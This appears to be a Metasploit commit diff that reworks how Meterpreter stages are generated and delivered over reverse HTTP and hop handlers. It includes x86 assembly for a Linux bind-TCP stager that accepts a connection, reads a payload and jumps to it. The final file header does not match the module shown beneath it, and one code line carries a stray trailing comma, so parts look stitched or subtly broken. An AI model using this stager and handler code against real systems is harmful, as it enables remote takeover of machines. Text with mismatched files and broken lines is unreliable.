Land rapid7#5300, meterpreter and stager multi-transport

Author: Brent Cook

Gemfile.lock

@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (~> 1.0)
       metasploit-model (~> 1.0)
-      metasploit-payloads (= 0.0.3)
+      metasploit-payloads (= 0.0.5)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -123,7 +123,7 @@ GEM
       activemodel (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
-    metasploit-payloads (0.0.3)
+    metasploit-payloads (0.0.5)
     metasploit_data_models (1.0.1)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)

lib/msf/base/sessions/meterpreter.rb

@@ -307,6 +307,8 @@ def is_valid_session?(timeout=10)
 
     begin
       self.machine_id = self.core.machine_id(timeout)
+      self.payload_uuid ||= self.core.uuid(timeout)
+
       return true
     rescue ::Rex::Post::Meterpreter::RequestError
       # This meterpreter doesn't support core_machine_id
@@ -326,8 +328,8 @@ def load_session_info()
     begin
       ::Timeout.timeout(60) do
         # Gather username/system information
-        username  = self.sys.config.getuid
-        sysinfo   = self.sys.config.sysinfo
+        username = self.sys.config.getuid
+        sysinfo  = self.sys.config.sysinfo
 
         safe_info = "#{username} @ #{sysinfo['Computer']}"
         safe_info.force_encoding("ASCII-8BIT") if safe_info.respond_to?(:force_encoding)

lib/msf/base/sessions/meterpreter_options.rb

@@ -18,7 +18,6 @@ def initialize(info = {})
         OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]),
         OptBool.new('EnableUnicodeEncoding', [true, "Automatically encode UTF-8 strings as hexadecimal", Rex::Compat.is_windows]),
         OptPath.new('HandlerSSLCert', [false, "Path to a SSL certificate in unified PEM format, ignored for HTTP transports"]),
-        OptBool.new('StagerCloseListenSocket', [false, "Close the listen socket in the stager", false]),
         OptInt.new('SessionRetryTotal', [false, "Number of seconds try reconnecting for on network failure", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_TOTAL]),
         OptInt.new('SessionRetryWait', [false, "Number of seconds to wait between reconnect attempts", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_WAIT]),
         OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcibly shut down', Rex::Post::Meterpreter::ClientCore::TIMEOUT_SESSION]),

lib/msf/core/handler/reverse_hop_http.rb

@@ -90,7 +90,7 @@ def start_handler
     ReverseHopHttp.hop_handlers[full_uri] = self
     self.monitor_thread = Rex::ThreadFactory.spawn('ReverseHopHTTP', false, uri,
         self) do |uri, hop_http|
-      hop_http.send_new_stage # send stage to hop
+      hop_http.send_new_stage(uri) # send stage to hop
       delay = 1 # poll delay
       # Continue to loop as long as at least one handler or one session is depending on us
       until hop_http.refs < 1 && hop_http.handlers.empty?
@@ -138,7 +138,7 @@ def start_handler
               :ssl                => false,
             })
             # send new stage to hop so next inbound session will get a unique ID.
-            hop_http.send_new_stage
+            hop_http.send_new_stage(uri)
           else
             hop_http.lock.unlock
           end
@@ -241,34 +241,27 @@ def initialize(info = {})
   #
   # Generates and sends a stage up to the hop point to be ready for the next client
   #
-  def send_new_stage
-    conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
+  def send_new_stage(uri)
+    # try to get the UUID out of the existing URI
+    info = process_uri_resource(uri)
+    uuid = info[:uuid] || Msf::Payload::UUID.new
+
+    # generate a new connect
+    sum = uri_checksum_lookup(:connect)
+    conn_id = generate_uri_uuid(sum, uuid)
     url = full_uri + conn_id + "/\x00"
 
     print_status("Preparing stage for next session #{conn_id}")
-    blob = stage_payload
-    #
-    # Patch options into the payload
-    #
-    Rex::Payloads::Meterpreter::Patch.patch_passive_service!(blob,
-      :ssl            => ssl?,
-      :url            => url,
-      :expiration     => datastore['SessionExpirationTimeout'],
-      :comm_timeout   => datastore['SessionCommunicationTimeout'],
-      :ua             => datastore['MeterpreterUserAgent'],
-      :proxy_host     => datastore['PayloadProxyHost'],
-      :proxy_port     => datastore['PayloadProxyPort'],
-      :proxy_type     => datastore['PayloadProxyType'],
-      :proxy_user     => datastore['PayloadProxyUser'],
-      :proxy_pass     => datastore['PayloadProxyPass'])
-
-    blob = encode_stage(blob)
+    blob = stage_payload(
+      uuid: uuid,
+      uri:  conn_id
+    )
 
     #send up
     crequest = mclient.request_raw(
         'method' => 'POST',
         'uri' => control,
-        'data' => blob,
+        'data' => encode_stage(blob),
         'headers' => {'X-init' => 'true'}
     )
     res = mclient.send_recv(crequest)

lib/msf/core/handler/reverse_http.rb

@@ -1,7 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/io/stream_abstraction'
 require 'rex/sync/ref'
-require 'rex/payloads/meterpreter/patch'
 require 'rex/payloads/meterpreter/uri_checksum'
 require 'rex/post/meterpreter/packet'
 require 'rex/parser/x509_certificate'
@@ -324,27 +323,12 @@ def on_request(cli, req, obj)
 
         resp['Content-Type'] = 'application/octet-stream'
 
-        blob = obj.stage_payload
-
-        verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
-                                             datastore['HandlerSSLCert'])
-        #
-        # Patch options into the payload
-        #
-        Rex::Payloads::Meterpreter::Patch.patch_passive_service!(blob,
-          :ssl           => ssl?,
-          :url           => url,
-          :ssl_cert_hash => verify_cert_hash,
-          :expiration    => datastore['SessionExpirationTimeout'].to_i,
-          :comm_timeout  => datastore['SessionCommunicationTimeout'].to_i,
-          :retry_total   => datastore['SessionRetryTotal'].to_i,
-          :retry_wait    => datastore['SessionRetryWait'].to_i,
-          :ua            => datastore['MeterpreterUserAgent'],
-          :proxy_host    => datastore['PayloadProxyHost'],
-          :proxy_port    => datastore['PayloadProxyPort'],
-          :proxy_type    => datastore['PayloadProxyType'],
-          :proxy_user    => datastore['PayloadProxyUser'],
-          :proxy_pass    => datastore['PayloadProxyPass'])
+        # generate the stage, but pass in the existing UUID and connection id so that
+        # we don't get new ones generated.
+        blob = obj.stage_payload(
+          uuid: uuid,
+          uri:  conn_id
+        )
 
         resp.body = encode_stage(blob)
 

lib/msf/core/handler/reverse_http/stageless.rb

@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 
 require 'msf/core'
+require 'msf/core/payload/transport_config'
 
 module Msf
 
@@ -14,31 +15,24 @@ module Msf
 
 module Payload::Linux::BindTcp
 
+  include Msf::Payload::TransportConfig
   include Msf::Payload::Linux
 
-  def close_listen_socket
-    datastore['StagerCloseListenSocket'].nil? || datastore['StagerCloseListenSocket'] == true
-  end
-
   #
   # Generate the first stage
   #
   def generate
-
-    # Generate the simple version of this stager if we don't have enough space
-    if self.available_space.nil? || required_space > self.available_space
-      return generate_bind_tcp(
-        port:         datastore['LPORT'],
-        close_socket: close_listen_socket
-      )
-    end
-
     conf = {
-      port:         datastore['LPORT'],
-      close_socket: close_listen_socket,
-      reliable:     true
+      port:     datastore['LPORT'],
+      reliable: false
     }
 
+    # Generate the more advanced stager if we have the space
+    unless self.available_space.nil? || required_space > self.available_space
+      conf[:exitfunk] = datastore['EXITFUNC'],
+      conf[:reliable] = true
+    end
+
     generate_bind_tcp(conf)
   end
 
@@ -50,19 +44,20 @@ def generate_bind_tcp(opts={})
     Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
   end
 
+  def transport_config(opts={})
+    transport_config_bind_tcp(opts)
+  end
+
   #
   # Determine the maximum amount of space required for the features requested
   #
   def required_space
     # Start with our cached default generated size
-    space = 104
+    space = cached_size
 
     # Reliability checks add 4 bytes for the first check, 5 per recv check (2)
-    space += 14
-
-    # Adding 6 bytes to the payload when we include the closing of the listen
-    # socket
-    space += 6 if close_listen_socket
+    # TODO: coming soon
+    #space += 14
 
     # The final estimated size
     space
@@ -77,7 +72,6 @@ def required_space
   def asm_bind_tcp(opts={})
 
     #reliable     = opts[:reliable]
-    close_socket = opts[:close_socket]
     encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
 
     asm = %Q^
@@ -99,10 +93,7 @@ def asm_bind_tcp(opts={})
         mov ecx,esp
         mov al,0x66                   ; socketcall syscall
         int 0x80                      ; invoke socketcall (SYS_SOCKET)
-    ^
 
-    unless close_socket
-      asm << %Q^
         ; set the SO_REUSEADDR flag on the socket
         push ecx
         push 4
@@ -119,11 +110,8 @@ def asm_bind_tcp(opts={})
         int 0x80
         xchg eax,edi                  ; restore the socket handle
         add esp, 0x14
-        pop ecx
-      ^
-    end
+        pop ecx                       ; restore ecx
 
-    asm << %Q^
         pop ebx
         pop esi
         push edx
@@ -138,15 +126,8 @@ def asm_bind_tcp(opts={})
         shl ebx,1                     ; SYS_LISTEN
         mov al,0x66                   ; socketcall syscall (SYS_LISTEN)
         int 0x80                      ; invoke socketcall
-      ^
 
-    if close_socket
-      asm << %Q^
         push eax                      ; stash the listen socket
-      ^
-    end
-
-    asm << %Q^
         inc ebx                       ; SYS_ACCEPT
         mov al,0x66                   ; socketcall syscall
         mov [ecx+0x4],edx
@@ -156,16 +137,9 @@ def asm_bind_tcp(opts={})
         mov al,0x3                    ; read syscall
         int 0x80                      ; invoke read
         xchg ebx,edi                  ; stash the accept socket in edi
-    ^
-    if close_socket
-      asm << %Q^
         pop ebx                       ; restore the listen socket
         mov al,0x6                    ; close syscall
         int 0x80                      ; invoke close
-      ^
-    end
-
-    asm << %Q^
         jmp ecx                       ; jump to the payload
     ^